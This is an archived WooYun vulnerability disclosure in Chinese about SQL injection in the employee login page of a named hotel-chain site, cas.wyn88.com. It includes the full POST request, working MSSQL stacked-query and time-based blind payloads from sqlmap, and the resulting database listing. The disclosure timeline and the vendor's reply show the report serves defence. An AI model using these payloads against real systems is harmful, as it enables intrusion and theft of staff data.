乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-07-23: 细节已通知厂商并且等待厂商处理中 2015-07-27: 厂商已经确认,细节仅向厂商公开 2015-08-06: 细节向核心白帽子及相关领域专家公开 2015-08-16: 细节向普通白帽子公开 2015-08-26: 细节向实习白帽子公开 2015-09-10: 细节向公众公开
http://cas.wyn88.com/员工登陆的地方。存在问题POST /defaultapp.aspx HTTP/1.1Content-Length: 292Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: http://cas.wyn88.com/Cookie: ASP.NET_SessionId=mlptkym5n3zzp5t0fxxwwppaHost: cas.wyn88.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun&__EVENTVALIDATION=/wEWBAKai5HiDwKb65yqBwKq3fPDCgLOlbHFCxxGpCzmkeM9SRn%2bu%2byIvmHwgfstJbPglqQOZ15M01n3&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0ZGR2D6nLeBBT/l/DUWGzDZh0bUHhjjp84xorSFsWyvnlSw%3d%3d
---Parameter: Inuser (POST) Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun';WAITFOR DELAY '0:0:5'--&__EVENTVALIDATION=/wEWBALMgqgBApvrnKoHAqrd88MKAs6VscULAbrONCvc/kPNUObZJ/Z+0VXvUObBCl/HPxJm5a2lWz4=&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0D2QWAgIBD2QWAgIHDxYCHglpbm5lcmh0bWwFIeW3peWPt+S4jeWtmOWcqOaIluWvhueggeS4jeato+ehrmRkaOXVh1+cZcejnG5sy4yZjM48zXrrR2RSoTigQ7HiSoA= Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: Submit4=%e7%99%bb%e9%99%86&Inpass=123456&Inuser=wooyun' AND 9281=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'iJFk'='iJFk&__EVENTVALIDATION=/wEWBALMgqgBApvrnKoHAqrd88MKAs6VscULAbrONCvc/kPNUObZJ/Z+0VXvUObBCl/HPxJm5a2lWz4=&__VIEWSTATE=/wEPDwUJODkwNDY3NTE0D2QWAgIBD2QWAgIHDxYCHglpbm5lcmh0bWwFIeW3peWPt+S4jeWtmOWcqOaIluWvhueggeS4jeato+ehrmRkaOXVh1+cZcejnG5sy4yZjM48zXrrR2RSoTigQ7HiSoA=---web server operating system: Windowsweb application technology: ASP.NET 4.0.30319, Nginx, ASP.NETback-end DBMS: Microsoft SQL Server 2008available databases [26]:[*] CenterCRM[*] ekp[*] HRMS[*] LMS[*] master[*] model[*] msdb[*] PmsBase[*] PmsBusiness[*] PmsBusiness_B[*] PmsBusiness_B_History[*] PmsBusiness_History[*] PmsLog[*] PmsLog_History[*] PreOpenBase[*] PreOpenBase_test[*] ReportServer[*] ReportServerTempDB[*] sso[*] tempdb[*] velcro7[*] webPur[*] WXMTR[*] wyn88db[*] Wyncmsdb[*] wyntempdb[13:48:51] [INFO] fetching tables for database: velcro7[13:48:51] [INFO] fetching number of tables for database 'velcro7'[13:48:51] [WARNING] time-based comparison requires larger statistical model, please wait..............................do you want sqlmap to try to optimize value(s) for DBMS delay responses (option'--time-sec')? [Y/n] y[13:49:10] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors[13:49:21] [INFO] adjusting time delay to 2 seconds due to good response times816 -----------------------》八百多张表,不跑了,员工信息在这里。拿到员工信息登陆,不知道里面有什么东东了。[13:49:33] [INFO] retrieved: dbo.addrgrouplink[13:52:45] [INFO] retrieved: dbo.addrlist[13:53:59] [INFO] retrieved: dbo.adv。。。。。。
fix
危害等级:高
漏洞Rank:15
确认时间:2015-07-27 08:38
感谢关注,修复中。
暂无